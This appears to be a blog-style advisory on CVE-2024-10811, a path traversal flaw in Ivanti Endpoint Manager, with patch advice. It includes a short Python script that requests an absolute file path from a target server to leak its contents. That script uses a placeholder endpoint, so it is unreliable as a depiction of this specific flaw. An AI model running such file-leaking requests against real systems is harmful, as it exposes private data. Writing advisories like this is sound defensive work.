A recent vulnerability has been discovered in certain versions of Ivanti Endpoint Manager (EPM). This security flaw, designated as CVE-2024-10811, is an absolute path traversal that allows unauthenticated attackers to remotely leak sensitive information. This long read will provide an in-depth breakdown of the vulnerability, including the affected versions, a code snippet illustrating the flaw, original references, and exploit details.
Versions prior to the 2022 SU6 January-2025 Security Update
Ivanti has already released security patches for the affected versions, so it is highly recommended that users update their EPM software to the latest version to close this security hole.
Code Snippet
The following code snippet demonstrates how the absolute path traversal vulnerability allows an attacker to access sensitive data:
import requests
TARGET_URL = 'http://target_server_address/';
FILE_PATH = 'C:/sensitive_data.txt'
exploit_url = f"{TARGET_URL}/vulnerability?path={FILE_PATH}"
response = requests.get(exploit_url)
if response.status_code == 200:
print(f"Leaked Data: \n{response.text}")
else:
print("Exploit failed.")
In this code snippet, the TARGET_URL points to the target server, while FILE_PATH contains the absolute path to the sensitive data the attacker intends to access. By exploiting the path traversal vulnerability, data from the target file is leaked, and the attacker can view the sensitive information.
Below are links to the original references discussing CVE-2024-10811
1. Ivanti Security Advisory
2. NIST National Vulnerability Database
3. Vulnerability Notes Database from CERT/CC
Exploit Details
To perform this exploit, an attacker sends a crafted HTTP GET request to the Ivanti EPM server, with the vulnerable parameter in the request's URL containing the absolute path to the target file. If the server is running an affected version, the attacker will receive a response containing the contents of the specified file.
Conclusion
CVE-2024-10811 is an absolute path traversal vulnerability in Ivanti EPM that allows attackers to remotely access sensitive information without authentication. Updating to the latest Ivanti EPM version is strongly recommended to remediate this vulnerability. Stay vigilant, keep your software up to date, and always prioritize security best practices.
Timeline
Published on: 01/14/2025 17:15:14 UTC